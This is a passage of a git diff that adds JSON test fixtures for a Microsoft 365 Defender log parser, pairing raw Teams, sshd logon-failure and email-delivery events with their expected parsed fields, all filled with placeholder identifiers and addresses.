DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": "{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json new file mode 100644 index 000000000..1d69ebb63 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + "-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + "working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json new file mode 100644 index 000000000..11ca88986 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL 